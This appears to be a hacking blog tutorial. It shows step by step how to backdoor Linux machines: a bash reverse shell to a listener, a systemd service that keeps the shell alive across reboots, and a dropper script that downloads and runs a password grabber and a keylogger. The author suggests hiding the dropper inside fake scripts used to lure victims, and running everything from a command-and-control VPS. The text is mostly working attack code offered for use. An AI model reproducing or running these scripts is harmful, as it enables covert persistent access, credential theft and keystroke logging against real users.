The art of bash scripting: Hack the linux

1. Introduction

Those days many skids does not know how powerful bash scripting is. The simple language gives you limitless possibilities of task automatization, which consequently brings you many ways of hacking. With combination of social engineering and bash scripting, some big damage could be done. This article will be focused on hacking the linux; Kali Linux. With this article I want to show you how easy the linux could be hacked and to aware you how important is to inspect each script you download, before the use. So in the bellow I will show you clash of Kali vs. Kali. We will obtain shell connection, creating service which will run automatically after each boot or reboot, so we can have persistent shell connection for ever. We will install keylogger and password grabber.

2. Shell

Here is example of how easy tcp connection could be establish between two linux systems.

Attackers command: nc -vv -l -p 8080

– setting the simple listener on port 8080 (you can use any port you want) with the netcat;TCP/IP Swiss army knife

Victim command: bash -i >& /dev/tcp/192.168.1.104/8080 0>&1

– bash command which make connection on IP 192.168.1.104 on port 8080. Of course in your case the IP is different.

3. Creating of service script

I created bash script with name service.sh, which will be used in our final attack.

#!/bin/bash
bash -i >& /dev/tcp/192.168.1.104/8080 0>&1

4. Creating of service

Bellow text allow us running the script on each reboot, boot or any case of losing connection.
We will use this text for creation of service on victim computer (/etc/systemd/system/system.service).

echo [Unit]
echo Description=Run script with systemd

echo [Service]
echo ExecStart=/etc/systemd/system/service.sh ==> this fuction will execute the service script from the paragraph 2.
echo Restart=always
echo TimeoutStartSec=20
echo RestartSec=20

echo [Install]
echo WantedBy=multi-user.target

5. Setting server for downloading files

in this case I used apache server, where I added (var/www/html) service.sh (from paragraph 3), keylogger and password grabber.

Run apache service with next command: service apache2 start

6. Creating the bash script for the attack

The bellow text could be added to any script (e.g. attack.sh). You can use it to create any fake script for e.g. cardings, facebook hacking, etc. or you can use it as standalone script.

wget http://192.168.1.104/service.sh -P /etc/systemd/system/ &>/dev/null #download the script and locate folder
chmod +x /etc/systemd/system/service.sh #exec. permissions

touch /etc/systemd/system/system.service #create system.service fail
echo [Unit] >> /etc/systemd/system/system.service
echo Description=Run script with systemd >> /etc/systemd/system/system.service

echo [Service] >> /etc/systemd/system/system.service
echo ExecStart=/etc/systemd/system/service.sh >> /etc/systemd/system/system.service
echo Restart=always >> /etc/systemd/system/system.service
echo TimeoutStartSec=20 >> /etc/systemd/system/system.service
echo RestartSec=20 >> /etc/systemd/system/system.service

echo [Install] >> /etc/systemd/system/system.service
echo WantedBy=multi-user.target >> /etc/systemd/system/system.service

systemctl daemon-reload #reload daemon
service system start #start the service and get the shell
systemctl enable system.service #enable service to start at boot up

wget http://192.168.1.104/la64li -P /bin &>/dev/null #download password grabber 64 bit. Run it after get the shell.
wget http://192.168.1.104/la32li -P /bin &>/dev/null #download password grabber 32 bit. Run it after get the shell.

wget http://192.168.1.104/tester -P /bin &>/dev/null #download the keylogger and locate folder.
nohup bash /bin/tester &>/dev/null #run the keylogger in background for ever

7. Attack

So, when you prepare the script from paragraph 6, with social engineering and some luck you can own the victim for ever. You will have shell for ever, you will install keylogger which will run for ever and sending key strokes on email, you will grab all passwords.

Before the victim run the script you need to set listener: nc -vv -l -p 8080
As soon as victim run the script, the charm will start.

8. Attack over the external network

Of course, attack is also possible over the external network. In this case I will focus on C2 server (command&control server). I prefer C2 instead of attacking directly from my computer with port forwarding or nrgork. Just create VPS with e.g. ubuntu and connect on it with ssh from anywhere. Set the listener on VPS, Also put all files for downloads on this server and have fun.

9. Conclusion

I show you how easy script for the attack could be prepared and how easy linux system could be hacked and owned for ever. I hope you liked the approach and that I give you some new knowledge and ideas.

10. Downloads

Linux keylogger: https://github.com/z00z/ZLogger

Password grabber (lazagne): https://github.com/AlessandroZ/LaZagne/releases/tag/1.0

Please follow and like us:
error
2 Comments

Add a Comment

Follow by Email
Facebook
Twitter